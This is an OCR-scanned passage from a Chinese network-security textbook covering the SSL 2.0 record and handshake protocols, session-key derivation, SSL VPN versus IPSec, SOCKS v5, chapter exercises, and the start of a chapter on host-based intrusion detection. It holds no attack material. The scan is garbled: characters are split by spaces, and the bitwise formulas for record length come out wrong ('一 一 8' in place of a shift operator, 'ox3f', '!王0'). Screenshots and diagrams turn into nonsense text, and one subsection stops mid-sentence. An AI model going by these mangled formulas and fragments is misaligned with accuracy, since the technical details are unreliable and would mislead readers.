证 、 客 户 认 证 (可 选 )、SSL 链 路 上 的 数据 完整 性 和 SSL 链 路 上 的 数据 保密 性 。 对 于 内 、 外 部 
应 用 来 说 ,使 用 SSL 可 保证 信息 的 真实 性 、 完 整 性 和 保密 性 。 目 前 SSL 协议 被 广泛 应 用 于 


170 网 络 安全 





各 种 浏览 器 应 用 ,也 可 以 应 用 于 Outlook 等 使 用 TCP 协议 传输 数据 的 C/S 应 用 。 正 因为 
SSL 协议 被 内 置 于 IE 等 浏览 器 中 ,使 用 SSL 协议 进行 认证 和 数据 加 密 的 SSL VPN 可 以 免 
于 安装 客户 端 。 


5.5.1 协议 规范 


SSL 协议 由 SSL 记录 协议 和 SSL 握手 协议 两 部 分 组 成 。 

5.5.1.1 SSL 记录 协议 

在 SSL 协议 中 ,所 有 的 传输 数据 都 被 封装 在 记录 中 。 记 录 是 由 记录 头 和 长 度 不 为 0 的 
记录 数据 组 成 的 。 所 有 的 SSL 通信 包括 握手 消息 、 安 全 空白 记录 和 应 用 数据 都 使 用 SSL 记 
录 层 。SSL 记录 协议 包括 记录 头 和 记录 数据 格式 的 规定 。 

SSL 的 记录 头 可 以 是 两 个 或 三 个 字 节 长 的 编码 。SSL 记录 头 包 含 的 信息 包括 记录 头 
的 长 度 . 记 录 数 据 的 长 度 . 记 录 数 据 中 是 否 有 粘贴 数据 。 其 中 粘贴 数据 是 在 使 用 块 加 密 算法 
时 填充 实际 数据 ,使 其 长 度 恰好 是 块 的 整数 倍 。 最 高 位 为 1 时 ,不 含有 粘贴 数据 ,记录 头 的 
长 度 为 2B, 记 录 数 据 的 最 大 长 度 为 32 767B; 最 高 位 为 0 时 ,含有 粘贴 数据 ,记录 头 的 长 度 
为 3B, 记 录 数 据 的 最 大 长 度 为 16 383B。 

当 数据 头 长 度 是 3B 时 ,次 高 位 有 特殊 的 含义 。 次 高 位 为 1 时 ,标识 所 传输 的 记录 是 普 
通 的 数据 记录 ; 次 高 位 为 0 时 ,标识 所 传输 的 记录 是 安全 空白 记录 (被 保留 用 于 将 来 协议 的 
扩展 ) 。 

记录 头 中 数据 长 度 编码 不 包括 数据 头 所 占用 的 字 节 长 度 。 记 录 头 长 度 为 2B 的 记录 长 
度 的 计算 公式 : 记录 长 度 =((byte[0] & 0x7f) 一 一 8)1byte[1]。 其 中 byte[0] .byte[1] 分 
别 表示 传输 的 第 一 个 .第 二 个 字 节 ,&. 表示 按 位 与 , 志 二 表示 左 移 8 位 , | 表示 按 位 或 。 记 录 
头 长 度 为 3B 的 记录 长 度 的 计算 公式 : 记录 长 度 =((byte[0]&ox3f) 二 < 8)|byte[1]。 判 
断 是 否 是 安全 空白 记录 的 条 件 是 (byte[0] & 0x40)1! 王 0。 传 输 的 第 三 个 字 节 为 粘贴 数据 的 
长 度 。 

SSL 的 记录 数据 包含 3 个 部 分 : MAC 数据 、 实 际 数 据 和 粘贴 数据 。 

MAC 数据 用 于 数据 完整 性 检查 。 计 算 MAC 数据 所 用 的 散 列 函数 由 握手 协议 中 的 
CIPHER-CHOICE 消息 确定 。 若 使 用 MD2 和 MD5 算法 , 则 MAC 数据 长 度 是 16B。MAC 
数据 的 计算 公式 : MAC 数据 =HASH[ 密 钥 , 实 际 数据 ,粘贴 数据 ,序号 ]。 当 会 话 的 客户 端 
发 送 数据 时 , 密 钥 是 客户 的 写 密 钥 (服务 器 用 读 密 钥 来 验证 MAC 数据 ); 而 当 会 话 的 客户 
端 接收 数据 时 , 密 钥 是 客户 的 读 密 钥 (服务 器 用 写 密 钥 来 产生 MAC 数据 )。 序 号 是 一 个 可 
以 被 发 送 和 接收 双方 递增 的 计数 器 。 每 个 通信 方向 都 会 建立 一 对 计数 器 ,分 别 被 发 送 者 和 
接收 者 拥有 。 计 数 器 有 32 位 ,计数 值 循环 使 用 ,每 发 送 一 个 记录 ,计数 值 递 增 一 次 ,序号 的 
初始 值 为 0。 

5.5.1.2 SSL 握手 协议 

SSL 握手 协议 包含 两 个 阶段 : 第 一 个 阶段 是 通信 的 初始 化 阶段 ,用 于 建立 私密 性 通信 
信道 ; 第 二 阶段 用 于 客户 认证 。 

1. 第 一 阶段 

通信 双方 都 发 出 HELLO 消息 。 当 双方 都 接收 到 HELLO 消息 时 ,就 有 足够 的 信息 确 
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定 是 否 需 要 一 个 新 的 密 钥 。 若 不 需要 新 的 密 钥 ,双方 立即 进入 握手 协议 的 第 二 阶段 。 否 则 ， 
此 时 服务 器 方 的 SERVER-HELLO 消息 将 包含 足够 的 信息 使 客户 方 产生 一 个 新 的 密 钥 。 
这 些 信 息 包括 服务 器 所 持 有 的 证 书 、 加 密 规 约 和 连接 标识 。 若 密 钥 产 生成 功 ,客户 方 发 出 
CLIENT-MASTER-KEY 消息 ,否则 发 出 错误 消息 。 最 终 , 当 密 钥 确定 以 后 ,服务 器 方向 客 
户 方 发 出 SERVER-VERIFY 消息 。 只 有 拥有 合适 的 公 钥 的 服务 器 才能 解 开 密 钥 。 图 5. 31 
为 第 一 阶段 的 流程 。 











































































































发 出 CLIENT-HELLO 消 息 等 待 CLIENT-HELLO 消 息 
1 
等 待 SERVER-HELLO 消 息 发 出 SEVER-HELLO 消 息 
需要 新 密 钥 ? N N 一 和 re 
1Y Y 
产生 新 的 密 钥 等 待 CLIENT-MASTER-KEY 消 息 
时 
发 出 CLIENT-MASTER-KEY 消 息 解 开 密 钥 
了 
等 待 SERVER-VERIFY 消 息 发 出 SERVER-VERIFY 消 息 
第 二 阶段 第 二 阶段 
(a) 客户 方 (b) 服务 器 方 


图 5.31 SSL 第 一 阶段 通信 流程 


需要 注意 的 是 ,每 一 通信 方向 上 都 需要 一 对 密 钥 , 所 以 一 个 连接 需要 4 个 密 钥 ,分 别 为 
客户 方 的 读 密 钥 客户 方 的 写 密 钥 .服务器 方 的 读 密 钥 .服务 器 方 的 写 密 钥 。 

2. 第 二 阶段 

此 时 服务 器 已 经 被 认证 。 

服务 器 方向 客户 发 出 认证 请 求 消息 : REQUEST-CERTIFICATE。 当 客户 收 到 服务 器 
的 认证 请 求 消息 时 ,发 出 自己 的 证 书 , 并 且 监 听 对 方 回 送 的 认证 结果 。 而 当 服务 器 收 到 客户 
的 证 书 时 , 若 认证 成 功 则 返回 SERVER-FINISH 消息 ,否则 返回 错误 消息 。 到 此 为 止 ,握手 
协议 全 部 结束 。 典 型 的 协议 消息 流程 如 表 5. 2 所 示 。 

表 5.2 SSL 协议 消息 流程 























消息 名 方向 内 容 
不 需要 新 密 钥 
CLIENT-HELLO CS challenge, session_id, cipher_specs 
SERVER-HELLO SC connection_id，session_id_hit 
CLIENT-FINISH CS Eclient_write_key[ connection_id] 
SERVER-VERIFY SC Eserver_write_key[ challenge] 
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续 表 
消息 名 方向 内 容 

不 需要 新 密 钥 

SERVER-FINISH SC Eserver_write_key[ session_id] 
需要 新 密 钥 

CLIENT-HELLO CS challenge, cipher_specs 
SERVER-HELLO SC connection_id, server_certificate, cipher_specs 
CLIENT-MASTER-KEY CS Eserver_public_key[master_key] 
CLIENT-FINISH C-~S Eclient_write_key[ connection_id] 
SERVER-VERIFY SC Eserver_write_key[challenge] 
SERVER-FINISH SC Eserver_write_key[ new_session_id] 

需要 客户 认证 
CLIENT-HELLO CC=-=S challenge，session_id，cipher_specs 
SERVER-HELLO S>C connection_id, session_id_hit 
CLIENT-FINISH CS Eclient_write_key[connection_id] 
SERVER-VERIFY Se Eserver_write_key[ challenge] 
REQUEST-CERTIFICATE 号 Eserver_write_key[auth_type, challenge] 
CLIENT-CERTIFICATE CS Eclient_write_key[ cert_type, client_cert, response_data] 
SERVER-FINISH S>C Eserver_write_key[ session_id] 


5.5.2 SSL 的 相关 技术 


1. 加 密 算法 和 会 话 密 铀 

加 密 算法 和 会 话 密 钥 在 握手 协议 中 协商 ,由 CIPHER-CHOICE 指定 。 现 有 的 SSL 版 
本 中 所 用 到 的 加 密 算法 包括 RC4、RC2、IDEA 和 DES, 而 加 密 算法 所 用 的 密 钥 由 消息 散 列 
函数 MD5 产生 。RC4、RC2 是 由 RSA 定义 的 ,其 中 RC2 适用 于 块 加 密 , RC4 适用 于 流 
加 密 。 

下 面 为 CIPHER-CHOICE 的 可 能 取 值 和 会 话 密 钥 的 计算 : 

SSL_CK_RC4_128_WITH_MD5 

SSL_CK_RC4_128_EXPORT40_WITH_MD5 

SSL_CK_RC2_128_CBC_WITH_MD5 

SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5 

SSL_CK_IDEA _128_CBC_WITH_MD5 

KEY-MATERIAL-0 = MD5L master_key, "0", challenge, connection_id ] 

KEY-MATERIAL-1 = MD5[ master_key, "1", challenge, connection_id ] 

CLIENT-READ-KEY = KEY-MATERIAL-0[0-15] 

CLIENT-WRITE-KEY = KEY-MATERIAL-1[0-15] 

SSL_CK_DES 64_CBC_WITH_MD5 

KEY-MATERIAL-0 = MD5[ master_key, challenge, connection_id | 

CLIENT-READ-KEY = KEY-MATERIAL-0L0-7] 

CLIENT-WRITE-KEY = KEY-MATERIAL-0[8-15] 
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SSL_CK_DES 192_EDE3_CBC_WITH_MD5 
KEY-MATERIAL-0 = MD5[ master_key, "0", challenge, connection id ] 
KEY-MATERIAL-1 = MD5[ master_key, "1", challenge, connection id ] 
KEY-MATERIAL-2 = MD5[ master_key, "2", challenge, connection_id ] 
CLIENT-READ-KEY-0 = KEY-MATERIAL-0[0-7] 

CLIENT-READ-KEY-1 = KEY-MATERIAL-0[8-15] 

CLIENT-READ-KEY-2 = KEY-MATERIAL-1[0-7] 

CLIENT-WRITE-KEY-0 = KEY-MATERIAL-1[8-15] 

CLIENT-WRITE-KEY-1 = KEY-MATERIAL-2[0-7] 

CLIENT-WRITE-KEY-2 = KEY-MATERIAL-2[8-15] 

其 中 , KEY-MATERIAL-0[0-15] 表 示 KEY-MATERIAL-0 中 的 16 个 字 节 ,KEY- 
MATERIAL-0L0-7] 表 示 KEY-MATERIAL-0 中 的 前 8 个 字 节 ,KEY-MATERIAL-0[L8- 
15] 表 示 KEY-MATERIAL-0 中 的 后 8 个 字 节 。 其 他 类 似 形 式 的 含义 以 此 类 推 ."0"、"1" 表 
示 数 字 0、1 的 ASCII 码 0x30、0x31。 

2. 认证 算法 

在 SSL 中 ,认证 算法 采用 X. 509 电子 证 书 标准 ,通过 使 用 RSA 算法 进行 数字 签名 来 

3. 服务 器 的 认证 

由 于 每 一 通信 方向 上 都 需要 一 对 密 钥 ,所 以 一 个 连接 需要 客户 方 的 读 密 钥 .客户 方 的 写 
密 钥 .服务器 方 的 读 密 钥 、 服 务 器 方 的 写 密 钥 。 其 中 ,服务 器 方 的 写 密 钥 和 客户 方 的 读 密 钥 、 
客户 方 的 写 密 钥 和 服务 器 方 的 读 密 钥 分 别 是 一 对 私有 、 公 有 密 钥 。 对 服务 器 进行 认证 时 ,只 
有 用 正确 的 服务 器 方 写 密 钥 加 密 CLIENT-HELLO 消息 形成 的 数字 签名 才能 被 客户 正确 
地 解密 ,从 而 验证 服务 器 的 身份 。 

若 通信 双方 不 需要 新 的 密 钥 , 则 它们 各 自 所 拥有 的 密 钥 已 经 符合 上 述 条 件 。 若 通信 双 
方 需要 新 的 密 钥 , 则 服务 器 方 首先 在 SERVER-HELLO 消息 中 的 服务 器 证 书 中 提供 了 服务 
器 的 公有 密 钥 ,服务 器 用 其 私有 密 钥 才 能 正确 解密 由 客户 方 使 用 服务 器 公有 密 钥 加 密 的 
MASTER-KEY ,从 而 获得 服务 器 方 的 读 密 钥 和 写 密 钥 。 

4. 客户 的 认证 

对 客户 方 的 认证 过 程 基本 同上 ,只 有 用 正确 的 客户 方 写 密 钥 加 密 的 内 容 才 能 被 服务 器 
方 用 其 读 密 钥 正 确 地 解 开 。 当 客户 收 到 服务 器 方 REQUEST-CERTIFICATE 消息 时 ,首先 使 
用 MD5 消息 散 列 函 数 获得 服务 器 方 信息 的 摘要 ,服务 器 方 的 信息 包括 KEY-MATERIAL-0、 
KEY-MATERIAL-1、KEY-MATERIAL-2、CERTIFICATE-CHALLENAGE-DATA (来 自 
REQUEST-CERTIFICATE 消息 )、 服 务 器 所 赋予 的 证 书 ( 来 自 SERVER-HELLO 消息 ) 。 
其 KEY-MATERIAL-1 和 KEY-MATERIAL-2 是 可 选 的 ,与 具体 的 加 密 算法 有 关 。 然 后 
客户 使 用 自己 的 读 密 钥 加 密 摘要 形成 数字 签名 ,从 而 被 服务 器 认证 。 


5.5.3 SSL 的 配置 
在 Internet Explorer 中 ,选择 “工具 ”一 “Internet 选项 ”菜单 命令 ,在 对 话 框 中 选择 “高 
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级 "选项 卡 ,在 “安全 ”项 下 对 SSL 的 相关 选项 进行 勾 选 。 如 图 5. 32 所 示 , 可 以 选择 支持 
SSL 2.0、SSL 3.0 或 者 TLS 1.0。 


Internet 选项 


第 规 | 安全 【隐私 | 内容 | 连接 | 程序 
设置 G) 

















口 通过 代理 连接 使 用 ITP 1.1 


对 无 效 站 点 证 书 发 出 警告 

口 关闭 浏览 器 时 清空 Internet 临时 文件 来 
回 检查 发 行商 的 证 书 吊销 

日 检查 服务 器 证 书 吊销 Ja 


口 
口 区 活动 内 容 在 我 的 计 委 机 上 的 女人 中 和 

国 同 检 尝 杰 白 和 a 
| > 

















还 原 默认 设置 B) 

















5.32 SSL 的 设置 


5.5.4 SSL 的 优 缺 点 


SSL VPN 相对 于 IPSec VPN 的 优势 如 下 : 

。 简单 。SSL 不 需要 特别 的 配置 ,可 以 直接 利用 浏览 器 中 内 嵌 的 SSL 协议 ,并 且 立 即 
生效 ,对 客户 端 软件 没有 特殊 限制 ; 而 IPSec 往往 需要 安装 并 配置 客户 端 软件 。 

。 安全 。SSL 安全 通道 在 客户 与 其 所 访问 的 资源 之 间 建 立 ,客户 对 资源 的 每 一 次 操作 
都 需要 经 过 安全 的 身份 验证 和 加 密 , 因 此 ,在 内 部 网 络 和 因特网 上 ,数据 都 不 透明 ， 
因此 可 以 确保 点 到 点 的 真正 安全 。 

。 可 扩展 。SSL VPN 服务 器 可 以 部 署 在 内 网 中 任 一 节点 处 ,可 以 随时 添加 需要 VPN 

保护 的 服务 器 ,而 不 影响 原 有 网 络 结构 ; 而 IPSec VPN 一 般 放 在 网 关 处 ,如 果 增 添 

新 的 设备 ,往往 要 改变 网 络 结构 ,并 重新 部 署 IPSec VPN。 

访问 控制 。 在 内 部 网 络 中 ,SSL VPN 可 以 根据 用 户 的 不 同 身份 给 予 不 同 的 访问 权 

限 ,允许 访问 不 同 的 数据 ; 还 可 以 对 访问 人 员 的 每 一 次 访问 ,完成 的 每 一 笔 交易 、 每 

一 个 操作 进行 数字 签名 ,保证 每 笔 数 据 的 不 可 抵赖 性 和 不 可 否认 性 ,为 事后 追踪 提 

供 依据 。 而 IPSec VPN 则 部 署 在 网 络 层 ,内 部 网 络 对 于 通过 VPN 的 访问 者 透明 ， 

因此 ,IPSec VPN 无 法 保护 内 部 数据 的 安全 。 

。 成 本 低 。SSL VPN 只 需要 在 总 部 放置 一 台 硬 件 设备 . 即 可 实现 所 有 用 户 的 远程 安 
全 访问 接 入 ; 而 IPSec VPN 每 增加 一 个 需要 访问 的 分 支 就 需要 添加 一 个 硬件 设备 。 

SSL VPN 的 主要 不 足 之 处 如 下 : 

。 必须 依靠 因特网 进行 访问 。 

。 SSL VPN 方案 依赖 反 代 理 技术 访问 公司 内 部 网 络 .对 复杂 Web 技术 提供 的 支持 
有 限 。 
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。 大 多 数 基于 SSL 的 VPN 基于 Web 浏览 器 工作 ,不 支持 非 Web 界面 的 应 用 。 
。 SSL VPN 只 对 通信 双方 的 某 个 应 用 加 密 , 而 不 是 对 通信 双方 主机 之 间 的 所 有 通信 
加 密 , 因 此 在 通信 中 可 能 存在 一 定 的 安全 隐患 。 


5.6 ”会话 层 VPN 协议 : SOCKS 


SOCKS v5 是 需要 认证 的 防火 墙 协议 ,SOCKS 可 以 与 SSL 协议 配合 使 用 ,以 建立 高 度 
安全 的 VPN。SOCKS 协议 的 优势 在 于 访问 控制 ,也 得 到 了 一 些 著名 的 公司 如 微软 、 
Netscape、IBM 的 支持 。 

SOCKS v5 的 优点 主要 如 下 : 

。 SOCKS v5 在 OSI 模 型 的 会 话 层 控制 数据 流 , 可 以 定义 非常 详细 的 访问 控制 ; 在 网 

络 层 只 能 根据 源 和 目的 IP 地 址 允许 或 拒绝 数据 包 通 过 ; 在 会 话 层 控 制 手段 更 多 。 
。 SOCKS v5 在 客户 机 和 主机 之 间 建 立 了 一 条 虚 电 路 ,可 根据 对 用 户 的 认证 进行 监视 
和 访问 控制 。 

。 SOCKS v5 工作 在 会 话 层 , 能 与 低层 协议 如 IPv4、IPSec、.PPTP、L2TP 一 起 使 用 。 

。 SOCKS v5 能 提供 非常 复杂 的 方法 来 保证 信息 安全 传输 。 

。 用 SOCKS v5 的 代理 服务 器 可 隐藏 网 络 地 址 结构 。 

。 如 果 SOCKS v5 与 防火 墙 结合 起 来 使 用 ,数据 包 经 唯一 的 防火 墙 端口 (默认 的 是 

1080) 到 代理 服务 器 ,代理 服务 器 过 滤 发 往 目 的 计算 机 的 数据 ,这 样 可 以 防止 防火 墙 
上 存在 的 漏洞 。 

。 SOCKS v5 能 为 认证 ,加密 和 密 钥 管 理 提供 “插件 ”模块 ,用 户 可 自由 采用 需要 的 

技术 。 

。 SOCKS v5 可 根据 规则 过 滤 数 据 流 ,包括 Java Applet 和 ActiveX 控件 。 

SOCKS v5 的 缺点 主要 如 下 : 

。 SOCKS v5 通过 代理 服务 器 来 增加 一 层 安 全 性 ,因此 其 性 能 往往 比 低层 协议 差 。 

。 尽管 SOCKS v5 比 网 络 层 和 传输 层 方案 更 安全 ,但 它 需 要 制定 更 为 复杂 的 安全 管理 

策略 。 

基于 SOCKS v5 的 虚拟 专用 网 最 适合 用 于 客户 机 到 服务 器 的 连接 模式 ,可 用 于 外 联网 
虚拟 专用 网 。 


5.7 本 章 小 结 


虚拟 专用 网 可 以 通过 公共 网 络 为 用 户 提 供 机 密 信 息 的 安全 传输 通道 ,取得 类 似 专用 网 
的 传输 效果 ,因此 获得 了 许多 企业 用 户 的 青睐 。 本 章 介绍 了 不 同类 型 的 虚拟 专用 网 及 其 各 
自 的 适用 场合 ,并 分 层次 详细 介绍 了 数据 链 路 层 、 网 络 层 、 传 输 层 、 会 话 层 的 VPN 安全 协 
议 , 重 点 分 析 了 现 阶 段 主要 应 用 的 网 络 层 IPSec 协议 .MPLS 协议 以 及 传输 层 SSL 协议 的 
通信 过 程 和 网 络 节点 中 对 这 些 协议 进行 配置 的 方法 。 
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5.8 本 章 习 题 


. 什么 是 VPN? VPN 有 哪些 主要 功能 ? 

. 根据 访问 方式 的 不 同 ,VPN 可 以 分 为 哪 几 类 ? 

. VPN 安全 协议 可 以 在 哪些 层次 实现 ? 各 个 层次 分 别 包含 哪些 主要 的 安全 协议 ? 
. 简 述 PPTP VPN 的 工作 原理 ,并 指出 其 优 缺 点 。 

. IPSec 的 AH 和 ESP 方式 有 何不 同 ? 为 什么 提供 了 ESP 后 还 需要 提供 AH? 

6. 


IPSec 的 隧道 操作 提供 了 隧道 模式 和 传输 模式 ,比较 这 两 种 方式 各 自 的 优 缺 点 及 适 


用 的 场合 。 


LA 
8. 


简 述 MPLS VPN 的 组 成 部 分 及 各 部 分 的 功能 。 
MPLS 节点 中 的 路 由 表 是 如 何 产生 的 ? MPLS VPN 中 的 标签 在 IP 分 组 转发 过 程 


中 如 何 起 作用 ? 


9; 


SSL 握手 协议 分 为 几 个 阶段 ”每 个 阶段 的 主要 功能 是 什么 ? 


第 6 章 人 侵 检测 技术 


入侵 检测 技术 是 发 现 攻击 者 的 渗透 和 入侵 行 为 的 技术 。 由 于 网 络 信息 系统 越 来 越 复 
杂 , 以 致 人 们 无 法 保证 系统 不 存在 设计 漏洞 和 管理 漏洞 。 在 近年 发 生 的 网 络 攻击 事件 中 , 突 
破 边界 防卫 系统 的 案例 并 不 多 见 , 黑 客 的 攻击 行动 主要 是 利用 各 种 漏洞 长 驱 直 入 ,使 边界 防 
火 墙 形同虚设 。 信 息 技术 的 普及 和 信息 基础 设施 的 不 完备 导致 了 严峻 的 安全 问题 。 人 们 不 
得 不 通过 入 侵 检 测 技术 尽早 发 现 入 侵 行 为 ,并 予以 防范 。 入 侵 检测 技术 根据 入 侵 者 的 攻击 
行为 与 合法 用 户 的 正常 行为 的 明显 不 同 , 实 现 对 入 侵 行为 的 检测 和 告警 ,以 及 对 入 侵 者 的 跟 
踪 定 位 和 行为 取证 。 

本 章 主 要 内 容 : 

。 入 侵 检测 概念 

。 人 入侵 检测 模型 

。 入 侵 检 测 系统 分 类 

。 入 侵 检 测 软件 

。 人 入侵 防御 系统 


6.1 人 侵 检测 概念 


入 侵 检 测 (intrusion detection) 是 对 入 侵 行 为 的 发 觉 。 它 通过 收集 计算 机 网 络 或 计算 机 
系统 中 的 若干 关键 点 的 信息 并 对 其 进行 分 析 , 从 中 发 现 网 络 或 系统 中 是 否 有 违反 安全 策略 
的 行为 和 被 攻击 的 迹象 。 进 行人 侵 检测 的 软件 与 硬件 的 组 合 便 是 和 人 侵 检测 系统 (Intrusion 
Detection System ,IDS) 。 

和 人 侵 检测 系统 可 以 尽早 地 发 现 异 常 网 络 访问 行为 ,尽早 地 检测 到 入侵 行为 ,并 可 以 尽早 
地 消除 人 侵 。 如 果 说 防火 墙 是 网 络 的 第 一 道 关口 ,那么 ,入 侵 检测 系统 则 是 网 络 的 第 二 道 关 
口 。 与 其 他 安全 产品 不 同 的 是 ,入 侵 检测 系统 需要 更 多 的 智能 , 它 将 得 到 的 数据 进行 分 析 ， 
并 得 出 有 用 的 结果 。 一 个 合格 的 入 侵 检测 系统 能 大 大 地 简化 系统 管理 员 的 工作 ,保证 应 用 
系统 的 安全 运行 。 

入 侵 检测 的 主要 功能 包括 : 监视 分 析 用 户 和 系统 的 行为 ,检测 系统 配置 的 漏洞 ,评估 敏感 
系统 和 数据 的 完整 性 ,识别 攻击 行为 ,对 异常 行为 进行 统计 ,自动 收集 与 系统 相关 的 补丁 ,进行 
审计 跟踪 以 识别 违反 安全 法 规 的 行为 ,使 系统 管理 员 可 以 较 有 效 地 监视 .审计 和 评估 系统 。 


6.2 入 侵 检测 模型 


一 种 比较 通用 的 入侵 检测 模型 如 图 6. 1 所 示 。 
IDS 需要 分 析 的 数据 统称 为 事件 (event), 它 可 以 是 网 络 中 的 数据 包 , 也 可 以 是 从 系统 
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wd 活动 记录 Dr 


建 异常 记录 


















2 如 | 修改 记录 状态 


审计 应 用 eg i 


日 志 网 络 包 检查 引擎 


图 6.1 入 侵 检测 模型 











定义 新 规则 ， 修 改 旧 规则 














日 志 等 其 他 途径 得 到 的 信息 。 
该 模型 的 3 个 主要 部 件 如 下 : 
。 事件 发 生 器 (event generator) 。 是 模型 中 提供 活动 信息 的 部 分 。 
。 活动 记录 器 (activity profile) 。 保 存 监视 中 的 系统 和 网 络 的 状态 。 当 事件 在 数据 源 
中 出 现时 ,就 改变 了 活动 记录 器 中 的 变量 。 
。 规则 集 (rule set)。 是 一 个 普通 的 核查 事件 和 状态 的 检查 器 引擎 , 它 使 用 模型 规则 、 
模式 和 统计 结果 来 对 入 侵 行 为 进行 判断 。 
此 外 ,反馈 也 是 入 侵 检测 模型 的 一 个 重要 组 成 部 分 。 现 有 的 事件 会 引发 系统 的 规则 学 
习 以 加 入 新 的 规则 或 者 修改 规则 。 系 统 的 3 个 子 系统 是 独立 的 ,可 以 分 布 在 不 同 的 计算 机 
上 运行 。 


6.3 人 侵 检 测 系统 的 分 类 


按 获 得 原始 数据 的 方法 可 以 将 人 侵 检测 系统 分 为 基于 主机 的 人 侵 检 测 和 基于 网 络 的 人 
侵 检 测 系统 。 


6.3.1 基于 主机 的 入 侵 检测 系统 


基于 主机 的 人 侵 检测 系统 出 现在 20 世纪 80 年 代 初 期 , 那 时 网 络 还 没有 现在 这 样 普遍 、 
复杂 ,而 且 网 络 之 间 也 没有 完全 连通 。 在 这 种 较为 简单 的 环境 里 ,检查 可 疑 行为 的 检验 记录 
是 很 常见 的 操作 。 由 于 入 侵 在 当时 是 相当 少见 的 ,对 攻击 的 事后 分 析 就 可 以 防止 今后 的 
攻击 。 

基于 主机 的 和 人 侵 检测 系统 是 通过 学 习 以 前 的 攻击 形式 并 选择 合适 的 方法 来 抵御 未 来 的 
攻击 。 基 于 主机 的 IDS 仍 使 用 验证 记录 ,但 自动 化 程度 大 大 提高 ,并 发 展 了 可 迅速 做 出 响 
应 的 检测 技术 。 通 常 ,基于 主机 的 IDS 可 监测 系统 .事件 和 Window 下 的 安全 记录 以 及 
UNIX 环境 下 的 系统 记录 。 当 有 文件 发 生变 化 时 ,IDS 将 新 的 记录 条 目 与 攻击 标记 相 比 较 ， 
看 它们 是 否 匹 配 。 如 果 匹 配 , 系 统 就 会 向 管理 员 报 警 并 向 别 的 目标 报告 ,以 便 采取 相应 的 措 
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施 进 行 处 理 。 
尽管 基于 主机 的 和 人 侵 检查 系统 在 速度 上 没有 基于 网 络 的 人 侵 检查 系统 快捷 ,但 它 确 实 
具有 基于 网 络 人 侵 检 测 系统 无 法 比拟 的 优点 ,具体 如 下 : 





性 能 价格 比 高 。 在 主机 数量 较 少 的 情况 下 ,这 种 方法 的 性 能 价格 比 可 能 更 高 。 尽 管 
基于 网 络 的 人 侵 检 测 系统 所 覆盖 的 范围 比较 广泛 ,但 其 价格 通常 比较 昂贵 。 配 置 一 
个 人 侵 监 测 系统 可 能 要 花费 10 000 美元 以 上 ,而 基于 主机 的 人 侵 检测 系统 每 个 主机 
代理 的 标价 仅 几 百 美元 ,并 且 客 户 在 最 初 安装 时 只 需 很 少 的 费用 。 

检测 更 加 全 面 。 这 种 方法 可 以 很 容易 地 监测 一 些 活动 ,如 对 敏感 文件 目录、 程序 或 
端口 的 存 取 , 而 这 些 活动 很 难 在 基于 网 络 的 系统 中 被 发 现 。 基 于 主机 的 IDS 监视 用 
户 和 文件 访问 活动 ,包括 文件 访问 改变 文件 权限 .试图 建立 新 的 可 执行 文件 以 及 试 
图 访问 特许 服务 。 例 如 ,基于 主机 的 IDS 可 以 监督 所 有 用 户 登 录 及 退出 登录 的 情 
况 ,以 及 每 位 用 户 在 连接 到 网 络 以 后 的 行为 。 基 于 网 络 的 系统 要 达到 这 个 程度 是 非 
常 困难 的 。 基 于 主机 技术 还 可 监视 通常 只 有 管理 员 才 能 实施 的 非 正 常 行为 。 操 作 
系统 记录 了 任何 有 关 用 户 账号 的 添加 、 删 除 、 更 改 的 情况 。 一 旦 发 生 了 更 改 ,基于 主 
机 的 IDS 就 能 检测 到 这 种 不 适当 的 更 改 。 基 于 主机 的 IDS 还 可 审计 能 影响 系统 记 
录 的 校 验 措施 的 改变 。 最 后 ,基于 主机 的 系统 可 以 监视 关键 系统 文件 和 可 执行 文件 
的 更 改 。 系 统 能 够 检测 到 那些 欲 重 写 关 键 系统 文件 或 者 安装 特洛伊 木马 或 后 门 的 
尝试 并 将 它们 中 断 。 而 基于 网 络 的 系统 有 时 会 检测 不 到 这 些 行为 。 

能 够 快速 定位 。 一 旦 入 侵 者 得 到 了 一 个 主机 的 用 户 名 和 口令 ,基于 主机 的 代理 是 最 
有 可 能 区 分 正常 的 活动 和 非法 的 活动 的 。 

易于 用 户 剪裁 。 每 一 个 主机 有 其 自己 的 代理 ,用 户 可 以 进行 灵活 设置 。 

几乎 不 需 增 加 新 的 硬件 。 基 于 主机 的 方法 有 时 几乎 不 需要 增加 专门 的 硬件 平台 。 
基于 主机 的 入 侵 检测 系统 存在 于 现 有 的 网 络 结构 之 中 ,包括 文件 服务 器 、Web 服务 
器 及 其 他 共享 资源 。 这 些 使 得 基于 主机 的 系统 效率 很 高 ,因为 它们 不 需要 在 网 络 上 
另外 安装 、 维 护 及 管理 硬件 设备 。 

对 网 络 流量 不 敏感 。 采 用 代理 的 方式 一 般 不 会 因为 网 络 流量 的 增加 而 丢掉 对 网 络 
行为 的 监视 。 

适用 于 基于 交换 技术 构造 的 网 络 环境 。 巾 于 基于 主机 的 系统 安装 在 网 络 中 的 各 种 
主机 上 ,它们 比 基 于 网 络 的 人 侵 检测 系统 更 加 适 于 交换 技术 构造 的 环境 。 交 换 设备 
可 将 大 型 网 络 分 成 许多 的 小 型 网 络 段 加 以 管理 。 所 以 从 覆盖 足够 大 的 网 络 范围 的 
角度 出 发 ,很 难 确定 配置 基于 网 络 的 IDS 的 最 佳 位 置 。 尽 管 业务 镜像 和 交换 机 上 的 
管理 端口 对 此 有 帮助 ,但 这 些 技术 有 时 并 不 适用 。 基 于 主机 的 入 侵 检 测 系统 可 安装 
在 所 需 的 重要 主机 上 ,在 交换 的 环境 中 具有 更 高 的 能 见 度 。 

适用 于 需要 加 密 处 理 的 环境 。 某 些 加 密 方式 也 向 基于 网 络 的 入 侵 检 测 发 出 了 挑战 。 
根据 加 密 方式 在 协议 堆栈 中 的 位 置 的 不 同 ,基于 网 络 的 系统 可 能 对 某 些 攻 击 没有 反 
应 。 基 于 主机 的 IDS 则 没有 这 方面 的 限制 。 当 操作 系统 及 基于 主机 的 系统 发 现 即 
将 到 来 的 业务 时 ,数据 流 已 经 被 解密 了 。 

能 够 较 早 地 确定 来 自信 侵 者 的 攻击 是 否 成 功 。 基 于 主机 的 IDS 通过 比照 已 发 生 事 
件 信息 ,可 以 比 基 于 网 络 的 IDS 更 加 准确 地 判断 攻击 是 否 成 功 。 在 这 方面 ,基于 主 
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机 的 IDS 是 基于 网 络 的 IDS 的 完美 补充 ,网 络 部 分 可 以 尽早 提供 警告 ,主机 部 分 可 
以 确定 攻击 成 功 与 否 。 


6.3.2 基于 网 络 的 入 侵 检 测 系统 


